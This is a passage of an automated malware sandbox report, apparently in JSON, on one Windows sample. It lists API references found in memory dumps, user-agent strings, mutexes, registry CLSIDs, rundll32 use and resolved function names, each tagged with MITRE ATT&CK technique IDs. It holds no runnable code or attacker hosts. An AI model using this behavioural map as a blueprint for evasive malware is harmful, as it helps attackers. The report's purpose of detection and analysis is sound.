(Indicator: \"GetLastError\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"CreateEventA\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FileTimeToSystemTime\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FileTimeToLocalFileTime\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"SetSystemTime\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetTempFileNameA\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"lstrlenA\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetVersionExA\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"OpenProcess\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-170", "type": 2, "relevance": 1, "name": "Possibly uses system binaries (Windows LOLbins)", "description": "Observed system executable string:\"%WINDIR%\\system\\rundll32.exe\" [Source: 00000000-00005736-00000C43-4486307328]", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-127", "type": 2, "relevance": 1, "name": "Found user-agent related strings", "description": "Found string \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\" (Indicator: \"mozilla/4.0 (\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005856-00000C96-8155233564\")\n Found string \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp, 00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp, 00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp, 00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp, 00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp, 00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp, 00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/7.0)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp, 00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp, 00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp, 00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp, 00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp, 00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/7.0)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp, 00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp, 00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp, 00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; rv:11.0) like Gecko\" (Indicator: \"mozilla/5.0 (\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp, 00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"nt: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"mozilla/4.0 (\"; Source: \"00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")\n Found string \"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (Indicator: \"user-agent: \"; Source: \"00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"rundll32.exe\" touched \"NetworkListManager\" (Path: \"HKCU\\CLSID\\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\")\n \"rundll32.exe\" touched \"Network List Manager\" (Path: \"HKCU\\CLSID\\{A47979D2-C419-11D9-A5B4-001185AD2B89}\")\n \"rundll32.exe\" touched \"PSFactoryBuffer\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\")\n \"rundll32.exe\" touched \"WinInetBroker Class\" (Path: \"HKCU\\CLSID\\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\system32\\apphelp.dll\" [Source: 00000000-00005736-0000018F-2123547]\n Observed system executable string:\"%WINDIR%\\system32\\uxtheme.dll\" [Source: 00000000-00005736-00000C28-52884786]\n Observed system executable string:\"%WINDIR%\\system32\\ole32.dll\" [Source: 00000000-00005736-00000C28-53569709]\n Observed system executable string:\"%WINDIR%\\system32\\MSCTF.dll\" [Source: 00000000-00005736-00000C28-53829752]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter CoRegisterInitializeSpy (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter CoRevokeInitializeSpy (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005736)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter StringFromGUID2 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter IUnknown_QueryService (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSPStartup (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHOpenSocket (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHOpenSocket2 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHJoinLeaf (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHNotify (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHGetSocketInformation (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHSetSocketInformation (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHGetSockaddrType (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHGetWildcardSockaddr (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHGetBroadcastSockaddr (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHAddressToString (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHStringToAddress (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSHIoctl (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsGetProxyInformation (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NdrClientCall2 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RpcBindingFromStringBindingW (UID: 00000000-00005856)\n \"rundll32.exe\" 